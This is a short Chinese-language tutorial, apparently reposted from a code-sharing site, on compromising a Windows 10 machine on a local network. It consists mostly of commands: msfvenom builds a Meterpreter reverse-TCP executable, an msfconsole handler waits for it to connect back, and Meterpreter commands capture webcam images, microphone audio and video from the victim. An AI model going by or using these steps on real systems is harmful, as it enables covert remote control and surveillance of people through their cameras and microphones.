內網滲透之入侵win10(入門)


條件:兩台試驗機在同一網段,目標機關閉殺毒軟件

步驟:msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx lport=xxx -f exe -o /root/xxx.exe

      -p windows/meterpreter/reverse_tcp --添加載荷(反向遠程控制程序)

      lhost=xxx       --主機ip

      lport=xxx        --監聽端口(自定義)

      -f exe        --文件格式為exe格式

      -o /root/payload.exe --生成的exe文件存放目錄

    生成的exe文件手動添加到電腦上並運行,在msfconsole上便可以看到信息  

   啟動metasploit工具(主控端)

      msfconsole --啟動主控端

      use exploit /multi/handler --使用handler作為主動端

      set payload windows/meterpreter/reverse_tcp --設置payload為反向遠程控制程序名稱

      set lhost --設置監聽ip

      set lport --設置監聽端口

      exploit --等待被控端啟動程序即可

    

    相關基礎命令:    

    webcam_list   --列出目標系統上所有網絡攝像頭列表,按數量編號

      -h:顯示幫助。

      -i :要使用的網絡攝像頭的索引號。

      -p :JPEG圖像文件路徑。默認為HOME / [隨機亂碼名字] .jpeg

      -q:JPEG圖像質量,默認為“50”

      -v:自動查看JPEG圖像,默認為“true”

    record_mic --錄音

      -h:顯示幫助。

      -d :記錄的秒數,默認為1秒

      -F :wav文件路徑。默認為HOME / [隨機亂碼名字] .wav

      -p :自動播放捕獲的音頻,默認為“true”

    run webcam --錄像

      -h:顯示幫助橫幅。

      -d :循環延遲間隔(以毫秒為單位),默認為1000

      -f:只抓一幀

      -g:發送到GUI而不是寫入文件

      -i :默認情況下使用的網絡攝像頭的索引1

      -l:默認情況下保持循環捕獲(無用)

      -p :默認情況下,文件夾映像的路徑將保存在當前工作目錄中

      -q :JPEG質量,默認為“50”

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM